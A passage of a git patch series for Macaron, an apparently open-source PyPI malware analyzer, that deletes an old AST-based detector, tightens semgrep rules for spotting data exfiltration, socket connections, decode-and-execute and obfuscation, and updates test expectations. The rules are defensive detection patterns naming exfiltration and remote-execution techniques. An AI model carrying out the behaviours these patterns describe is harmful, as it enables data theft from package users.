logger.debug(error_msg) raise ConfigurationError(error_msg) - semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--config", custom_rule_path] + semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--oss-only", "--config", custom_rule_path] try: process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: From d5db1cd4eb0a597ba3acf436af8d0bb65aeb1972 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 24 Feb 2025 15:58:23 +1000 Subject: [PATCH 18/37] chore: removed old code Signed-off-by: Carl 
Flottmann --- .../sourcecode/pypi_sourcecode_analyzer.py | 259 ------------------ 1 file changed, 259 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index c742cf2b1..b6702b53a 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -7,14 +7,9 @@ This allows for deeper analysis of potentially malicious behavior. """ -import ast -import base64 -import binascii -import ipaddress import json import logging import os -import re import subprocess # nosec import tempfile from collections import defaultdict @@ -206,257 +201,3 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes analysis_result[category].append({"file": file, "start": start, "end": end}) return result, dict(analysis_result) - - -class DataFlowTracer(ast.NodeVisitor): - """The class is used to create the symbol table and analyze the dataflow.""" - - def __init__(self) -> None: - self.symbol_table: dict = {} # Store variable assignments - self.trace_path: list = [] - - def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Assign node and build the symbol table.""" - for target in node.targets: - if isinstance(target, ast.Name): - target_name = target.id - if isinstance(node.value, ast.Name): - self.symbol_table[target_name] = str(node.value.id) - elif isinstance(node.value, ast.Constant): - self.symbol_table[target_name] = str(node.value.value) - # Handle other assignment types as needed (e.g., function calls, lists) - else: - self.symbol_table[target_name] = ast.unparse(node.value) - self.generic_visit(node) # Important for visiting nested assign - - def trace_back(self, variable_name: str) -> list: - """Get the full path of the dataflow. 
- - Parameters - ---------- - variable_name: str - The argument of the function call. - - Returns - ------- - list - The path of the dataflow. - """ - self.trace_path = [] - self._recursive_trace(variable_name) - return self.trace_path - - def _recursive_trace(self, variable_name: str) -> None: - """Recursively build the dataflow path by analyzing the symbol table. - - Parameters - ---------- - variable_name: str - The argument of the function call. - """ - if variable_name in self.symbol_table: - value = self.symbol_table[variable_name] - if not self.trace_path: - self.trace_path.extend([variable_name, value]) - else: - self.trace_path.append(value) - if ( - isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value - ): # only trace if it is a var name - self._recursive_trace(value) - - def generate_symbol_table(self, source_code: str) -> None: - """Generate the symbol table. - - Parameters - ---------- - source_code: str - The source code of the script. - """ - tree = ast.parse(source_code) - self.visit(tree) - - -class FunctionCallAnalyzer(ast.NodeVisitor): - """This class analyzes Python source code to identify potential suspicious behavior.""" - - def __init__(self, suspicious_pattern: dict, tracer: DataFlowTracer) -> None: - """Initialize the analyzer. - - Parameters - ---------- - suspicious_pattern: dict - The suspicious behaviour mainly includes the function call and constant. - """ - self.suspicious_patterns: dict = suspicious_pattern - self.analysis_detail: dict = { - "OS Detection": {}, - "Code Execution": {}, - "Information Collecting": {}, - "Remote Connection": {}, - "Custom Setup": {}, - "Obfuscation": {}, - } - self.tracer = tracer - self.is_malware = False - - def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit all root node.""" - self.generic_visit(node) - - # TODO: Detect OS might generate false alert. 
- # def visit_If(self, node: ast.If) -> None: - # """Visit the If node.""" - # if isinstance(node.test, ast.Compare): - # unparsed_expr: str = ast.unparse(node) - # # Some malware excute different malicious code based on the victims OS. - # for os_detection_constant in self.suspicious_patterns["ast_constant"]["os_detection"]: - # if os_detection_constant in unparsed_expr: - # TODO: This function is required to be implemented with dataflow analysis - # self.analysis_detail["OS Detection"][node.lineno] = unparsed_expr - # self.is_malware = True - # self.generic_visit(node) - - def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns["calls"] - suspicious_const: dict = self.suspicious_patterns["constants"] - function_call: str = ast.unparse(node.func) - args: str = " ".join([ast.unparse(arg) for arg in node.args]) - expr: str = ast.unparse(node) - trace_path: list = self.tracer.trace_back(args) - path: str = "" - if trace_path: - path = " ->".join(trace_path) - for call_type in suspicious_calls: - if self._is_malware(suspicious_calls[call_type], function_call): - for constant_type in suspicious_const: # Further confirmed by checking the arguments - if ( - self._is_malware(suspicious_const[constant_type], args) - or IP().extract_public_ipv4(args) - or self._is_malware(suspicious_const[constant_type], Decryptor().base64_decode(args)) - ): - self._summarize_analysis_detail(call_type, node.lineno, expr) - self.is_malware = True - elif self._is_malware(suspicious_const[constant_type], path): - self._summarize_analysis_detail(call_type, node.lineno, expr, path) - self.is_malware = True - self.generic_visit(node) - - def visit_ClassDef(self, node: ast.ClassDef) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the ClassDef node. 
This function is used to detect malicious behavior in setup.py.""" - if not node.bases: - self.generic_visit(node) - return - - for base in node.bases: - if isinstance(base, ast.Name): - if base.id == "install": - # TODO: Not pretty sure including this in setup.py means it is a malware, so the self.is_malware is not updated. - self.analysis_detail["Custom Setup"][node.lineno] = node.name - self.generic_visit(node) - - def _summarize_analysis_detail( - self, function_call_type: str, lineno: int, expr: str, trace_path: str | None = None - ) -> None: - """Store the analysis result in based on different type of malicious behaviour. - - Parameters - ---------- - function_call_type: str - The suspcious function call type. - lineno: int - The location of the source code block. - expr: str - The source code block. - trace_path: str - The dataflow path. - """ - detail = [expr] - - if trace_path: - detail.append(trace_path) - - match function_call_type: - case "code_execution": - self.analysis_detail["Code Execution"][lineno] = detail - case "info_collecting": - self.analysis_detail["Information Collecting"][lineno] = detail - case "remote_connection": - self.analysis_detail["Remote Connection"][lineno] = detail - case "obfuscation": - self.analysis_detail["Obfuscation"][lineno] = detail - - def _is_malware(self, malicious_pattern: list, target: str | None) -> bool: - """Check the source code matched the suspicious pattern. - - Parameters - ---------- - malicious_pattern: list - A collection of the suspicious source code. - target: str - The componenet of the source code block. - - Returns - ------- - bool - The result. 
- """ - if not target: - return False - for _ in malicious_pattern: # pylint: disable=C0103, C0501 - if _ in target: - return True - return False - - def analyze(self, source_code: str) -> tuple[bool, dict]: - """Analyze the source code.""" - tree = ast.parse(source_code) - self.visit(tree) - return self.is_malware, self.analysis_detail - - -class Decryptor: - """This class includes multiple built-in decryption methods.""" - - # Only decrypt the string with the built-in decrypt method; otherwise, provide the source code - # for the user. And notify them to decrypt using the corresponding decrypt method - # TODO: Implement more decryption method. - - def __init__(self) -> None: - pass - - def base64_decode(self, encoded_value: str | bytes) -> str | None: - """Decode the encoded value.""" - try: - decoded_bytes = base64.b64decode(encoded_value) - return decoded_bytes.decode("utf-8") - except (binascii.Error, UnicodeDecodeError): - return None - - -class IP: - """This class provides the method to identify the IP in the source code.""" - - def __init__(self) -> None: - pass - - def is_valid_public_ipv4(self, ip: str) -> bool: - """Check whether it is a public IPv4.""" - try: - ip_obj = ipaddress.ip_address(ip) - return ip_obj.version == 4 and not ip_obj.is_private and not ip_obj.is_loopback - except ValueError: - # If ip_address() raises an error, it's not a valid IP - return False - - def extract_public_ipv4(self, text: str) -> list: - """Extract the public IPv4 from the source code.""" - ipv4_pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" - all_ips = re.findall(ipv4_pattern, text) - # Filter valid public IPv4 addresses - valid_public_ipv4s = [] - for ip in all_ips: - if self.is_valid_public_ipv4(ip): - valid_public_ipv4s.append(ip) - return valid_public_ipv4s From 0eb2d54811051decf5e49b48e27c29f4caace974 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 11:35:00 +1000 Subject: [PATCH 19/37] feat: updated semgrep rules to reduce false positives 
based on ICSE25 dataset results Signed-off-by: Carl Flottmann --- .../pypi_malware_rules/exfiltration.yaml | 93 ++- .../pypi_malware_rules/obfuscation.yaml | 145 ++--- .../exfiltration/expected_results.json | 34 +- ...exfiltration.py => remote_exfiltration.py} | 0 .../obfuscation/default_assigning.py | 61 -- .../obfuscation/expected_results.json | 600 +++++------------- .../{tools.py => obfuscation_tools.py} | 0 7 files changed, 303 insertions(+), 630 deletions(-) rename tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/{remote-exfiltration.py => remote_exfiltration.py} (100%) delete mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py rename tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/{tools.py => obfuscation_tools.py} (100%) diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml index 146d04315..4eee8d033 100644 --- a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -2,7 +2,7 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. rules: -- id: remote-exfiltration +- id: exfiltration_remote-exfiltration metadata: description: Identifies the flow of sensitive information to a remote endpoint. message: Detected exfiltration of sensitive data to a remote endpoint. @@ -19,7 +19,6 @@ rules: # result of code/command evaluation - pattern: exec(...) - pattern: eval(...) - - pattern: ast.literal_eval(...) - pattern: builtins.exec(...) - pattern: builtins.eval(...) - pattern: __import__('builtins').exec(...) @@ -120,8 +119,29 @@ rules: # file exfiltration - pattern: os.read(...) - - pattern: $FILE.read(...) - - pattern: $FILE.readlines(...) + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) 
as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern-either: + - pattern: $FILE.read(...) + - pattern: $FILE.readlines(...) - pattern: yaml.safe_load(...) - pattern: json.loads(...) @@ -129,23 +149,54 @@ rules: - pattern-either: # remote connection # using socket module - - pattern: $SOC.accept(...) - - pattern: $SOC.bind(...) - - pattern: $SOC.connect(...) - - pattern: $SOC.connect_ex(...) - - pattern: $SOC.listen(...) - - pattern: $SOC.recv(...) - - pattern: $SOC.recvfrom(...) - - pattern: $SOC.recvmsg(...) - - pattern: $SOC.recvmsg_into(...) - - pattern: $SOC.recvfrom_into(...) - - pattern: $SOC.recv_into(...) - - pattern: $SOC.send(...) - - pattern: $SOC.sendall(...) - - pattern: $SOC.sendto(...) - - pattern: $SOC.sendmsg(...) - - pattern: $SOC.sendmsg_afalg(...) - - pattern: $SOC.sendfile(...) + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) 
+ - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) # using requests module - pattern: requests.get(...) - pattern: requests.post(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index c74122458..ab956dfda 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -2,57 +2,7 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. rules: -- id: default-assigning - metadata: - description: Identifies when a default python function is assigned to another variable - message: Found an instance of assigning a builtin python function to a variable - languages: - - python - severity: ERROR - pattern-either: - # assigning, many obfuscation tools listed below do this - - pattern: $VAR = __import__ - - pattern: $VAR = getattr - - pattern: $VAR = bytes - - pattern: $VAR = bytearray - - pattern: $VAR = exec - - pattern: $VAR = eval - - pattern: $VAR = setattr - - pattern: $VAR = compile - - pattern: $VAR = map - - pattern: $VAR = open - - pattern: $VAR = zip - - pattern: $VAR = vars - - pattern: $VAR = dir - # doing the same using the builtins module - - pattern: $VAR = builtins.__import__ - - pattern: $VAR = builtins.getattr - - pattern: $VAR = builtins.bytes - - pattern: $VAR = builtins.bytearray - - pattern: $VAR = builtins.exec - - pattern: $VAR = builtins.eval - - pattern: $VAR = builtins.setattr - - pattern: $VAR = builtins.compile - - pattern: $VAR = builtins.map - - pattern: $VAR = builtins.open - - pattern: $VAR = builtins.zip - - pattern: $VAR = builtins.vars - - pattern: $VAR = builtins.dir - - pattern: $VAR = __import__('builtins').__import__ - - pattern: $VAR = 
__import__('builtins').getattr - - pattern: $VAR = __import__('builtins').bytes - - pattern: $VAR = __import__('builtins').bytearray - - pattern: $VAR = __import__('builtins').exec - - pattern: $VAR = __import__('builtins').eval - - pattern: $VAR = __import__('builtins').setattr - - pattern: $VAR = __import__('builtins').compile - - pattern: $VAR = __import__('builtins').builtins.map - - pattern: $VAR = __import__('builtins').open - - pattern: $VAR = __import__('builtins').zip - - pattern: $VAR = __import__('builtins').vars - - pattern: $VAR = __import__('builtins').dir - -- id: obfuscation-tools +- id: obfuscation_obfuscation-tools metadata: description: detects the use of python obfuscation packages on the source code message: Found an instance of import and/or using python obfuscation tools @@ -88,16 +38,7 @@ rules: - pattern: import mystificate - pattern: import demiurgic -- id: inline-imports - metadata: - description: detects the use of the private inline import __import__(...) - message: detected use of inline imports - languages: - - python - severity: ERROR - pattern: __import__($MODULE) - -- id: decode-and-execute +- id: obfuscation_decode-and-execute metadata: description: detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes message: detected the flow of a decoded string value to a remote endpoint, process, code evaluation, or file write @@ -116,11 +57,9 @@ rules: # bytes decoding - pattern: | b'...'.decode(...) - - pattern: $BYTES.decode(...) - pattern: bytes.decode(...) - pattern: builtins.bytes.decode(...) - pattern: __import__('builtins').bytes.decode(...) - - pattern: $BYTES.join(...).decode() # decompression - pattern: zlib.decompress(...) - pattern: __import__('zlib').decompress(...) @@ -147,24 +86,44 @@ rules: - pattern-either: # remote connection # using socket module - - pattern: socket.socket(...) - - pattern: $SOC.accept(...) - - pattern: $SOC.bind(...) 
- - pattern: $SOC.connect(...) - - pattern: $SOC.connect_ex(...) - - pattern: $SOC.listen(...) - - pattern: $SOC.recv(...) - - pattern: $SOC.recvfrom(...) - - pattern: $SOC.recvmsg(...) - - pattern: $SOC.recvmsg_into(...) - - pattern: $SOC.recvfrom_into(...) - - pattern: $SOC.recv_into(...) - - pattern: $SOC.send(...) - - pattern: $SOC.sendall(...) - - pattern: $SOC.sendto(...) - - pattern: $SOC.sendmsg(...) - - pattern: $SOC.sendmsg_afalg(...) - - pattern: $SOC.sendfile(...) + - patterns: + - pattern-either: + - patterns: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) # using requests module - pattern: requests.get(...) - pattern: requests.post(...) @@ -284,15 +243,33 @@ rules: # code evaluation/execution - pattern: exec(...) - pattern: eval(...) - - pattern: ast.literal_eval(...) - pattern: builtins.exec(...) - pattern: builtins.eval(...) - pattern: __import__('builtins').exec(...) - pattern: __import__('builtins').eval(...) # file write - - pattern: $FILE.write(...) - - pattern: $MODULE.dumps(...) + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... 
+ - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern: $FILE.write(...) - pattern: os.write(...) - pattern: os.writev(...) - pattern: os.pwrite(...) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json index 33b4d6716..8890a70b6 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -1,19 +1,19 @@ { - "src.macaron.resources.pypi_malware_rules.remote-exfiltration": [ - { - "file": "exfiltration/remote-exfiltration.py", - "start": 31, - "end": 31 - }, - { - "file": "exfiltration/remote-exfiltration.py", - "start": 42, - "end": 42 - }, - { - "file": "exfiltration/remote-exfiltration.py", - "start": 50, - "end": 50 - } + "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": [ + { + "file": "exfiltration/remote-exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "exfiltration/remote-exfiltration.py", + "start": 42, + "end": 42 + }, + { + "file": "exfiltration/remote-exfiltration.py", + "start": 50, + "end": 50 + } ] -} + } diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py similarity index 100% rename from tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py rename to tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py diff --git 
a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py deleted file mode 100644 index ed2c9dda9..000000000 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py +++ /dev/null @@ -1,61 +0,0 @@ -# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - -""" -Running this code will not produce any malicious behavior, but code isolation measures are -in place for safety. -""" - -import sys - -# ensure no symbols are exported so this code cannot accidentally be used -__all__ = [] -sys.exit() - -def test_function(): - """ - All code to be tested will be defined inside this function, so it is all local to it. This is - to isolate the code to be tested, as it exists to replicate the patterns present in malware - samples. 
- """ - sys.exit() - import builtins - _ = __import__ - _ = getattr - _ = bytes - _ = bytearray - _ = exec - _ = eval - _ = setattr - _ = compile - _ = map - _ = open - _ = zip - _ = vars - _ = dir - _ = builtins.__import__ - _ = builtins.getattr - _ = builtins.bytes - _ = builtins.bytearray - _ = builtins.exec - _ = builtins.eval - _ = builtins.setattr - _ = builtins.compile - _ = builtins.map - _ = builtins.open - _ = builtins.zip - _ = builtins.vars - _ = builtins.dir - _ = __import__('builtins').__import__ - _ = __import__('builtins').getattr - _ = __import__('builtins').bytes - _ = __import__('builtins').bytearray - _ = __import__('builtins').exec - _ = __import__('builtins').eval - _ = __import__('builtins').setattr - _ = __import__('builtins').compile - _ = __import__('builtins').builtins.map - _ = __import__('builtins').open - _ = __import__('builtins').zip - _ = __import__('builtins').vars - _ = __import__('builtins').dir diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 1da7cb255..b4f1dce24 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -1,450 +1,156 @@ { - "src.macaron.resources.pypi_malware_rules.decode-and-execute": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 30, - "end": 30 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 67, - "end": 67 - } + 
"src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } ], - "src.macaron.resources.pypi_malware_rules.inline-imports": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 44, - "end": 44 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 49, - "end": 49 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 50, - "end": 50 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 52, - "end": 52 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 53, - "end": 53 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 57, - "end": 57 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 58, - "end": 58 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 59, - "end": 59 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 60, - "end": 60 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/tools.py", - 
"start": 69, - "end": 69 - } - ], - "src.macaron.resources.pypi_malware_rules.default-assigning": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 62, - "end": 62 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 24, - "end": 24 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 25, - "end": 25 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 26, - "end": 26 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 28, - "end": 28 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 29, - "end": 29 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 30, - "end": 30 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 31, - "end": 31 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 32, - "end": 32 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 34, - "end": 34 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 35, - "end": 35 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 36, - "end": 36 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 37, - "end": 37 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 39, - "end": 39 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 40, - "end": 40 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 41, - "end": 41 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 42, - "end": 42 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 43, - "end": 43 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 44, - "end": 44 - }, - { - 
"file": "obfuscation/default_assigning.py", - "start": 45, - "end": 45 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 46, - "end": 46 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 48, - "end": 48 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 49, - "end": 49 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 50, - "end": 50 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 52, - "end": 52 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 53, - "end": 53 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 57, - "end": 57 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 58, - "end": 58 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 59, - "end": 59 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 60, - "end": 60 - }, - { - "file": "obfuscation/default_assigning.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - } - ], - "src.macaron.resources.pypi_malware_rules.obfuscation-tools": [ - { - "file": "obfuscation/tools.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/tools.py", - "start": 25, - "end": 31 - }, - { - "file": "obfuscation/tools.py", - "start": 26, - "end": 26 - }, - { - "file": "obfuscation/tools.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/tools.py", - "start": 28, - "end": 28 - }, - { - "file": "obfuscation/tools.py", - "start": 30, - "end": 31 - }, - { - "file": "obfuscation/tools.py", - "start": 
33, - "end": 33 - }, - { - "file": "obfuscation/tools.py", - "start": 37, - "end": 37 - }, - { - "file": "obfuscation/tools.py", - "start": 39, - "end": 45 - }, - { - "file": "obfuscation/tools.py", - "start": 40, - "end": 40 - }, - { - "file": "obfuscation/tools.py", - "start": 41, - "end": 41 - }, - { - "file": "obfuscation/tools.py", - "start": 42, - "end": 42 - }, - { - "file": "obfuscation/tools.py", - "start": 44, - "end": 45 - }, - { - "file": "obfuscation/tools.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/tools.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/tools.py", - "start": 53, - "end": 59 - }, - { - "file": "obfuscation/tools.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/tools.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/tools.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/tools.py", - "start": 58, - "end": 59 - }, - { - "file": "obfuscation/tools.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/tools.py", - "start": 65, - "end": 65 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - } + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ + { + "file": "obfuscation/tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/tools.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/tools.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/tools.py", + "start": 40, + "end": 40 + }, + { + 
